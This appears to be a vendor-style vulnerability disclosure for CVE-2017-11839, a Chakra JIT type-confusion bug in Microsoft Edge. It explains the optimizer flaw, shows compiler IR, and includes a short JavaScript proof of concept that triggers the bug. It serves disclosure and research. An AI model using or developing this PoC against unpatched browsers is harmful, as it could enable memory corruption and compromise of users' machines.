Microsoft Edge Chakra JIT BailOutOnTaggedValue Bailouts

`Microsoft Edge: Chakra: JIT: BailOutOnTaggedValue bailouts can be generated for constant values   
  
CVE-2017-11839  
  
  
1.  
In the Chakra's JIT compilation process, it stores variables' type information by basic block.  
  
function opt(b) {  
let o;  
if (b) {  
// BASIC BLOCK (a)  
o = {};  
} else {  
// BASIC BLOCK (b)  
o = 1.1;  
}  
// BASIC BLOCK (c)  
return o;  
}  
  
For example, let's think the above code gets optimized. At the basic block (a), the type of "o" is always "Object". At the basic block (b), the type of "o" is always "CanBeTaggedValue_Float". At the basic block (c), it combines the two types, and marks the type of "o" as "CanBeTaggedValue_Mixed"(Object + CanBeTaggedValue_Float).  
  
Explanation of TaggedValue in Chakra: <a href="http://abchatra.github.io/TaggedFloat/" title="" class="" rel="nofollow">http://abchatra.github.io/TaggedFloat/</a>  
  
But unlike variables, the type information of constants like numbers, strings is managed globally. This means, once a constant is marked as some type in a certain block. All blocks will treat it as that type regardless of the control flow.  
  
2.  
Chakra uses a BailOutOnTaggedValue bailout to ensure a variable's type is "Object". The bailouts can be generated when inlining JavaScript functions.  
  
function opt(inlinee) {  
inlinee();  
}  
  
Generated IR code for the above code:  
StatementBoundary #0 #0000   
s6.var = StartCall 1 (0x1).i32 #0000   
BailOnNotObject s3[LikelyCanBeTaggedValue_Object].var #0006 Bailout: #0006 (BailOutOnInlineFunction)  
s10.var = Ld_A [s3[LikelyObject].var+8].u64 #0006   
BailOnNotEqual [s10.var!].i32, 26 (0x1A).i32 # Bailout: #0006 (BailOutOnInlineFunction)  
BailOnNotEqual [s3[LikelyObject].var+40].u64, 0xXXXXXXXX (FunctionBody [Anonymous function (#1.3), #4]).u64 # Bailout: #0006 (BailOutOnInlineFunction)  
  
As you can see after the "BailOnNotObject" opcode which generates "BailOutOnTaggedValue" bailouts, the type of "s3" becomes "LikelyObject" from "LikelyCanBeTaggedValue_Object". This means there's no case where "s3" is not an object after the opcode which ensures its type, so it's safe to use it as an object without checks after the opcode.  
  
But the problem is that this can be applied to constants.  
  
Here's the PoC.  
  
function opt2(inlinee, v) {  
if (v > 0) {  
inlinee();  
} else {  
inlinee.x = 1.1;  
}  
}  
  
function opt() {  
opt2(2.3023e-320, null);  
}  
  
function main() {  
opt2(() => {}, 1); // feed a function to the profiler  
  
for (let i = 0; i < 10000; i++) {  
opt();  
}  
}  
  
main();  
  
We can simply think it as follows:  
(NOT PRECISE just for understanding)  
  
Just after inlining:  
// Basic block (a)  
s2 = 2.30235E-320; // constant  
inlinee = s2; // variable  
if (null > 0) {  
// Basic block (b)  
BailOnNotObject(inlinee);  
inlinee();  
} else {  
// Basic block (c)  
inlinee.x = 1.1;  
}  
  
Type map:  
Constants:  
s2: CanBeTaggedValue_Float  
Basic block (a):  
inlinee: CanBeTaggedValue_Float  
Basic block (b):  
inlinee: CanBeTaggedValue_Float  
Basic block (c):  
inlinee: CanBeTaggedValue_Float  
  
In the Global Optimization Phase:  
// Basic block (a)  
s2 = 2.30235E-320;  
if (null > 0) {  
// Basic block (b)  
BailOnNotObject(s2);  
s2();  
} else {  
// Basic block (c)  
s2.x = 1.1;  
}  
  
Type map:  
Constants:  
s2: CanBeTaggedValue_Float -> Float  
Basic block (a):  
Basic block (b):  
Basic block (c):  
  
At the basic block (b), the BailOnNotObject opcode changes the type of "s2" to "Float". And since "s2" is a constant, that change affects the basic block (c). So it leads to type confusion at the basic block (c).  
  
Note: Just "Float" is considered an Object type.  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`